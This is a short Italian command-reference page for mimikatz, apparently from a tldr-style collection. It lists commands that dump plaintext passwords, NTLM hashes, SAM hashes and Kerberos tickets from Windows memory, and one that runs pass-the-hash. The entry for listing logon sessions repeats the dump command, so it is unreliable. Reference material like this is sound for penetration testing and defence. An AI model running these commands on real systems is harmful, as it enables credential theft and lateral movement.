1003 B
1003 B
mimikatz
Interagisce con le credenziali di Windows, esegue dump di credenziali, manipolazione di token e altro. Richiede privilegi di amministratore e in genere viene eseguito su Windows. Maggiori informazioni: https://github.com/gentilkiwi/mimikatz.
- Esegui mimikatz in modalità interattiva:
mimikatz
- Abilita i privilegi di debug (necessari per la maggior parte delle operazioni):
mimikatz "privilege::debug"
- Elenca le sessioni di accesso disponibili:
mimikatz "sekurlsa::logonpasswords"
- Esegui il dump di password in chiaro, hash NTLM e ticket Kerberos dalla memoria:
mimikatz "sekurlsa::logonpasswords"
- Esegui Pass-the-Hash con un hash NTLM specifico e avvia un comando:
mimikatz "sekurlsa::pth /user:{{username}} /domain:{{domain}} /ntlm:{{hash}} /run:{{cmd}}"
- Esegui il dump degli hash del database SAM locale:
mimikatz "lsadump::sam"
- Estrai i ticket Kerberos ed esportali su file:
mimikatz "kerberos::list /export"
- Esci da mimikatz:
exit